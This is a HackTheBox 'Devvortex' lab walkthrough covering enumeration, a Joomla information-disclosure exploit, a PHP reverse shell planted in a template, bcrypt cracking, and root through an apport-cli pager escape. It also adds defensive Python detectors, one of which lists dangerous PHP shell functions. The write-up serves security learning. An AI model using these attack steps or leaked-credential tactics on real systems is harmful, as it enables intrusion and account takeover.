Devvortex Walkthrough (HTB)

Hello folks, I'm Abzee, a n00b trying to be the best one day. I decided to kick-start 2024 by rooting Devvortex on the HackTheBox platform. It was really fun to play with and I learnt a few things.

Enumeration

Let's start with a simple nmap scan to check for open ports on the given IP with this simple command.

┌──(abzee__Saminu)-[~/Documents/HTB/Devvotex]
└─$ nmap -sC -sV --min-rate 2000 -oA nmap 10.10.11.242
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-01 17:48 WAT
Nmap scan report for devvortex.htb (10.10.11.242)
Host is up (0.67s latency).
Not shown: 722 filtered tcp ports (no-response), 277 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.06 seconds

We have two open ports, HTTP and SSH. Let's see what we have on port 80 and get to the juicy part.

┌──(abzee__Saminu)-[~/Documents/HTB/Devvotex]
└─$ http 10.10.11.242
HTTP/1.1 302 Moved Temporarily
Connection: keep-alive
Content-Length: 154
Content-Type: text/html
Date: Mon, 01 Jan 2024 16:33:10 GMT
Location: http://devvortex.htb/
Server: nginx/1.18.0 (Ubuntu)

<html>
<head><title>302 Found</title></head>
<body>
<center><h1>302 Found</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>

We have a domain name that we have to add to our hosts file to access the webpage.

sudo gedit /etc/hosts

Now we are good to go; there shouldn't be any problem accessing the webpage since what we need has already been added.

A nice webpage to dive into, but unfortunately I couldn't get anything from it, so I moved on to scan for subdomains using FFUF.

┌──(abzee㉿Saminu)-[~/Documents/HTB/Devvotex]
└─$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.devvortex.htb" -u http://devvortex.htb -fs 154

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://devvortex.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.devvortex.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 154
________________________________________________

dev                     [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 1882ms]

Oh nice, with this we can surely get one or two things to exploit and get a foothold, but first let's visit the subdomain we just got from our scan.

It is running the Joomla CMS, which is vulnerable to unauthenticated information disclosure (CVE-2023-23752).

Link to exploit: https://www.exploit-db.com/exploits/51334

┌──(abzee㉿Saminu)-[~/Documents/HTB/Devvotex]
└─$ ruby exploit.rb http://dev.devvortex.htb
Users
[649] lewis (lewis) - lewis@devvortex.htb - Super Users
[650] logan paul (logan) - logan@devvortex.htb - Registered

Site info
Site name: Development
Editor: tinymce
Captcha: 0
Access: 1
Debug status: false

Database info
DB type: mysqli
DB host: localhost
DB user: lewis
DB password: P4ntherg0t1n5r3c0n##
DB name: joomla
DB prefix: sd4fg_
DB encryption 0

Boom!! Having some juicy user and pass is cool. Time to test them out by visiting the administrator login page.
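From the defender's side, the disclosure above leaves a clear trace in the web server logs. The following is an added example (not part of this walkthrough or the exploit) that runs simple detection logic over constructed nginx access-log lines. It assumes the default nginx "combined" log format and the Joomla 4 web-service paths that the public exploit requests with `public=true` (`/api/index.php/v1/users` and `/api/index.php/v1/config/application`); the sample log lines and IPs are made up for the demo.

```python
"""Detection logic for CVE-2023-23752 probing in nginx access logs.

Added example, not code from the walkthrough. Assumes the nginx "combined"
log format and the Joomla web-service paths the public exploit requests.
"""
import re
from urllib.parse import urlsplit, parse_qs

# nginx "combined": ip - user [time] "METHOD target HTTP/x" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Joomla 4 web-service endpoints that the bug exposed without authentication
SENSITIVE_API_PATHS = (
    "/api/index.php/v1/config/application",
    "/api/index.php/v1/users",
)


def parse_line(line):
    """Split one access-log line into fields; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    return rec


def is_config_disclosure_probe(rec):
    """True when a request hits a sensitive API path with public=true.

    Any such request is worth alerting on; a 200 status is the strongest
    signal, because a patched site does not answer these requests with data."""
    if rec is None or rec["method"] != "GET":
        return False
    if not any(rec["path"].startswith(p) for p in SENSITIVE_API_PATHS):
        return False
    # public=true is the parameter the exploit sends to bypass the access check
    return rec["query"].get("public", ["false"])[0].lower() == "true"


def scan(lines):
    """Return one finding per probe, preserving log order."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if is_config_disclosure_probe(rec):
            hits.append({"ip": rec["ip"], "path": rec["path"], "status": rec["status"]})
    return hits


# Constructed sample log lines (not taken from the box). The first two mimic the
# exploit's two requests, the third a blocked probe, the fourth normal traffic.
SAMPLE_LOG = [
    '10.10.14.124 - - [01/Jan/2024:17:30:01 +0000] "GET /api/index.php/v1/users?public=true HTTP/1.1" 200 512 "-" "Ruby"',
    '10.10.14.124 - - [01/Jan/2024:17:30:02 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1337 "-" "Ruby"',
    '10.10.14.50 - - [01/Jan/2024:17:31:00 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 403 120 "-" "curl/7.88"',
    '10.10.14.77 - - [01/Jan/2024:17:32:00 +0000] "GET /index.php/component/users/?view=login HTTP/1.1" 200 7000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The check keys on the path plus the `public=true` parameter rather than on a user agent, since the exploit's user agent is trivially changed; the status code is carried along so a 200 can be prioritised over a 403 when triaging.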

And we are in by trying these credentials.

User:lewis
Pass:P4ntherg0t1n5r3c0n##

Foothold

Since we are in, we can proceed by selecting System, then under Site Templates there should be a template that we can edit.

The index.php can't be edited because of the permissions set on it, so I decided to edit offline.php instead, replacing its content with my PHP shell payload, saving it and starting my listener. Then, after accessing http://dev.devvortex.htb/templates/cassiopeia/offline.php, boom, we receive a connection back.

┌──(abzee㉿Saminu)-[~/Documents/HTB/Devvotex]
└─$ rlwrap nc -nvlp 1337                    
listening on [any] 1337 ...
connect to [10.10.14.124] from (UNKNOWN) [10.10.11.242] 40618
Linux devvortex 5.4.0-167-generic #184-Ubuntu SMP Tue Oct 31 09:21:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
 17:43:46 up 24 min,  1 user,  load average: 2.49, 0.87, 0.51
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
logan    pts/1    10.10.14.105     17:34    1:09   2:23   1:07  dd if=/dev/zero of=/dev/null
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@devvortex:/$ 
zsh: suspended  rlwrap nc -nvlp 1337
                                                                                                                                                                                                                                              
┌──(abzee㉿Saminu)-[~/Documents/HTB/Devvotex]
└─$ stty raw -echo;fg     
[1]  + continued  rlwrap nc -nvlp 1337
www-data@devvortex:/$ stty rows 21 cols 120
stty rows 21 cols 120
www-data@devvortex:/$ export TERM=xterm-256color
export TERM=xterm-256color
www-data@devvortex:/$ 
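The foothold above works because a site administrator account can rewrite template PHP files in place, which is exactly what file integrity monitoring of the templates directory is meant to catch. The following is an added example (not the walkthrough's or Joomla's code) that builds a constructed templates tree in a temporary directory, records a SHA-256 baseline, simulates the offline.php edit and reports files that changed or that call functions a template has no business calling. The suspicious-function list is an assumption to be tuned per deployment.

```python
"""Integrity check for a Joomla templates directory.

Added example, not code from the walkthrough. The directory tree, baseline
and tampered file are all constructed inside a temp dir so it runs offline.
"""
import hashlib
import os
import re
import tempfile

# Functions a template file should never call; a match in templates/ is a
# strong indicator of a planted shell. Assumed list, extend for your site.
SUSPICIOUS_CALLS = re.compile(
    r"\b(?:shell_exec|exec|system|passthru|popen|proc_open|fsockopen|eval|assert)\s*\(",
    re.IGNORECASE,
)


def hash_tree(root):
    """Return {relative_path: sha256_hex} for every file under root."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                manifest[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return manifest


def audit(root, baseline):
    """Compare the tree with a baseline manifest and scan PHP files for dangerous calls."""
    current = hash_tree(root)
    findings = []
    for rel, digest in current.items():
        reasons = []
        if rel not in baseline:
            reasons.append("new file")
        elif baseline[rel] != digest:
            reasons.append("content changed since baseline")
        if rel.endswith(".php"):
            with open(os.path.join(root, rel), "r", errors="replace") as fh:
                m = SUSPICIOUS_CALLS.search(fh.read())
            if m:
                reasons.append("calls " + m.group(0).rstrip("(").strip() + "()")
        if reasons:
            findings.append((rel, reasons))
    for rel in baseline:
        if rel not in current:
            findings.append((rel, ["deleted"]))
    return sorted(findings)


def demo():
    """Build a constructed templates tree, take a baseline, then tamper with offline.php."""
    with tempfile.TemporaryDirectory() as root:
        tpl = os.path.join(root, "cassiopeia")
        os.makedirs(tpl)
        with open(os.path.join(tpl, "index.php"), "w") as fh:
            fh.write("<?php defined('_JEXEC') or die; echo 'site'; ?>\n")
        with open(os.path.join(tpl, "offline.php"), "w") as fh:
            fh.write("<?php defined('_JEXEC') or die; echo 'offline'; ?>\n")
        baseline = hash_tree(root)
        assert audit(root, baseline) == []  # clean tree: nothing to report
        # Simulate the edit from the walkthrough: offline.php replaced with code
        # that runs a command (a harmless marker here, not a shell).
        with open(os.path.join(tpl, "offline.php"), "w") as fh:
            fh.write("<?php echo shell_exec('id'); ?>\n")
        return audit(root, baseline)


if __name__ == "__main__":
    for rel, reasons in demo():
        print(rel, "->", "; ".join(reasons))
```

In production the baseline would be taken from a clean install or package manifest and stored outside the web root; the hash comparison catches any rewrite regardless of content, and the function scan gives a reason a responder can act on immediately.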

Got in as www-data, but not a problem. Time to read the contents of user.txt.

www-data@devvortex:/$ cd /home
cd /home
www-data@devvortex:/home$ ls -la
ls -la
total 12
drwxr-xr-x  3 root  root  4096 Sep 26 19:16 .
drwxr-xr-x 19 root  root  4096 Oct 26 15:12 ..
drwxr-xr-x  3 logan logan 4096 Jan  1 17:48 logan
www-data@devvortex:/home$ cd logan
cd logan
www-data@devvortex:/home/logan$ ls -la
ls -la
total 32
drwxr-xr-x 3 logan logan 4096 Jan  1 17:48 .
drwxr-xr-x 3 root  root  4096 Sep 26 19:16 ..
lrwxrwxrwx 1 root  root     9 Oct 26 14:58 .bash_history -> /dev/null
-rw-r--r-- 1 logan logan  220 Sep 26 19:16 .bash_logout
-rw-r--r-- 1 logan logan 3771 Sep 26 19:16 .bashrc
drwx------ 2 logan logan 4096 Oct 26 15:12 .cache
-rw-r--r-- 1 logan logan  807 Sep 26 19:16 .profile
-rw-rw-r-- 1 logan logan  199 Jan  1 17:48 panic.c
-rw-r----- 1 root  logan   33 Jan  1 17:19 user.txt
www-data@devvortex:/home/logan$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@devvortex:/home/logan$

We don't have permission to read user.txt unless we are the user logan, so let's move around for possible credentials.

MySQL credentials to try out.

A hash to crack. This is where JohnTheRipper comes in.

┌──(abzee__Saminu)-[~/Documents/HTB/Devvotex]
└─$ hashid hash      
--File 'hash'--
Analyzing '$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12'
[+] Blowfish(OpenBSD) 
[+] Woltlab Burning Board 4.x 
[+] bcrypt 
--End of file 'hash'--

┌──(abzee__Saminu)-[~/Documents/HTB/Devvotex]
└─$ john --wordlist=/opt/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
No password hashes left to crack (see FAQ)
                                                                                                                                                                                                                                              
┌──(abzee__Saminu)-[~/Documents/HTB/Devvotex]
└─$ john --show hash                               
?:tequieromucho

1 password hash cracked, 0 left
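What hashid did above is read the `$2y$10$` prefix. As an added example (not part of the original post), the block below identifies a modular-crypt-format hash from its prefix and splits the bcrypt string recovered above into variant, cost, salt and digest, so the work factor behind the cracking run can be read off directly. The scheme table is a small assumed subset of prefixes seen in web application databases.

```python
"""Identify and parse a modular-crypt-format password hash.

Added example, not code from the walkthrough. The SCHEMES table is an
assumed, deliberately short list of common crypt(3)-style prefixes.
"""
import re

# $id$ prefix -> scheme name
SCHEMES = {
    "1": "md5crypt",
    "2a": "bcrypt",
    "2b": "bcrypt",
    "2y": "bcrypt (crypt_blowfish / PHP password_hash)",
    "5": "sha256crypt",
    "6": "sha512crypt",
    "argon2i": "argon2i",
    "argon2id": "argon2id",
}

# bcrypt layout: $2y$<2-digit cost>$<22-char salt><31-char digest>,
# salt and digest both in bcrypt's own base64 alphabet (./A-Za-z0-9)
BCRYPT_RE = re.compile(r"^\$(?P<variant>2[abxy]?)\$(?P<cost>\d{2})\$(?P<body>[./A-Za-z0-9]{53})$")


def identify(hash_str):
    """Name the scheme from the $id$ prefix, like hashid does."""
    m = re.match(r"^\$([^$]+)\$", hash_str)
    if not m:
        return "unknown (not modular crypt format)"
    return SCHEMES.get(m.group(1), "unknown scheme id '%s'" % m.group(1))


def parse_bcrypt(hash_str):
    """Split a bcrypt hash into its fields and derive the per-guess cost."""
    m = BCRYPT_RE.match(hash_str)
    if not m:
        raise ValueError("not a well-formed bcrypt hash")
    cost = int(m.group("cost"))
    if not 4 <= cost <= 31:
        raise ValueError("bcrypt cost %d out of range 4..31" % cost)
    body = m.group("body")
    return {
        "variant": m.group("variant"),
        "cost": cost,
        "rounds": 2 ** cost,  # expensive key-setup iterations per password guess
        "salt": body[:22],
        "digest": body[22:],
    }


# The hash recovered on the box, quoted from the hashid output above
SAMPLE_HASH = "$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12"

if __name__ == "__main__":
    print(identify(SAMPLE_HASH))
    for key, value in parse_bcrypt(SAMPLE_HASH).items():
        print("%8s: %s" % (key, value))
```

Cost 10 means 1024 key-setup iterations per guess, which is slow enough to matter but not enough to save a password that sits in rockyou; the salt only stops precomputation, not a dictionary run against a single hash. The fix on the application side is password strength and a higher cost, not a different prefix.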

John to the rescue and we found ourselves a password; let's try it on SSH.

User:logan
Pass:tequieromucho

┌──(abzee㉿Saminu)-[~/Documents/HTB/Devvotex]
└─$ ssh logan@10.10.11.242
logan@10.10.11.242's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-167-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 System information disabled due to load higher than 2.0

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Jan  1 18:03:20 2024 from 10.10.14.105
logan@devvortex:~$ ls
panic.c  user.txt
logan@devvortex:~$ cat user.txt
099c4620c4cbac6b4423a27f5456eecf
logan@devvortex:~$ whoami
logan
logan@devvortex:~$

Privilege Escalation

The wait is over, time to own the system, because that is the sweetest thing ever. First of all let's see what we have in sudo -l.

logan@devvortex:~$ sudo -l
[sudo] password for logan: 
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli
logan@devvortex:~$

This vulnerability is a privilege escalation in apport-cli 2.26.0 (CVE-2023-1326).

Let's see how we can use it to gain system.

Running sudo /usr/bin/apport-cli -f will bring up some options; select 1, then 3, which brings up another set of options. This time they are not numbers but letters, so select V, then type !/bin/bash and boom, we are system.

Please reproduce the crash and collect a backtrace.  See https://wiki.ubuntu.com/X/Backtracing for directions.

Press any key to continue... 

..dpkg-query: no packages found matching xorg
....................

*** Send problem report to the developers?

After the problem report has been sent, please fill out the form in the
automatically opened web browser.

What would you like to do? Your options are:
  S: Send report (1.5 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C): V
root@devvortex:/home/logan# whoami
root
root@devvortex:/home/logan# cat /root/root.txt;hostname
ad22b7bb92bc869a4feb2511ed328110
devvortex
root@devvortex:/home/logan#
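The sudo rule is the real root cause here: it hands root to a program that opens a pager, and a pager's shell escape runs as whoever sudo launched it as. As an added example (not the walkthrough's code), the block below parses the `sudo -l` output shown above and flags rules that grant ALL, rules tagged NOPASSWD, rules with no argument restriction, and rules whose target is in an assumed watch-list of pager- or editor-spawning programs. The watch-list is an assumption for the demo and should be extended for a real fleet.

```python
"""Audit the rules printed by `sudo -l` for least-privilege problems.

Added example, not code from the walkthrough. PAGER_SPAWNERS is an assumed
watch-list; the sudo -l text below is quoted from the box session above.
"""
import os
import re

# Programs that hand the terminal to a pager or editor, whose shell escape then
# runs as the sudo target user (this is what CVE-2023-1326 abuses in apport-cli).
PAGER_SPAWNERS = {"apport-cli", "less", "more", "man", "vi", "vim", "nano"}

# (runas_user : runas_group) [TAG: ...] command [args]
RULE_RE = re.compile(
    r"^\((?P<user>[^:)]+?)(?:\s*:\s*(?P<group>[^)]+?))?\)\s*"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>\S+)(?:\s+(?P<args>.*))?$"
)


def parse_sudo_l(text):
    """Return one dict per rule listed after the 'may run the following commands' line."""
    rules, in_rules = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        rules.append({
            "runas_user": m.group("user").strip(),
            "runas_group": (m.group("group") or "").strip(),
            "tags": tags,
            "cmd": m.group("cmd"),
            "args": m.group("args"),  # None means sudoers allows any arguments
        })
    return rules


def audit(rules):
    """Return (command, [issues]) for every rule that violates least privilege."""
    findings = []
    for r in rules:
        issues = []
        if r["cmd"] == "ALL":
            issues.append("grants ALL commands")
        if "NOPASSWD" in r["tags"]:
            issues.append("NOPASSWD: no re-authentication required")
        if os.path.basename(r["cmd"]) in PAGER_SPAWNERS:
            issues.append("opens a pager/editor: a shell escape inherits the sudo target user (%s)" % r["runas_user"])
        if r["args"] is None and r["cmd"] != "ALL":
            issues.append("no argument restriction")
        if issues:
            findings.append((r["cmd"], issues))
    return findings


# The sudo -l output from the box, quoted from the session above.
SUDO_L_OUTPUT = """\
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli
"""

if __name__ == "__main__":
    for cmd, issues in audit(parse_sudo_l(SUDO_L_OUTPUT)):
        print(cmd)
        for issue in issues:
            print("  -", issue)
```

Run against the box's output it reports the apport-cli rule twice over: the program opens a pager, and no arguments are pinned, so `-f` (and everything else) is allowed. The mitigation is to drop the rule, or at least restrict it to the exact argument list needed and keep apport patched, since a sudoers entry cannot stop a pager from escaping to a shell.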

This is all for today and thanks for reading.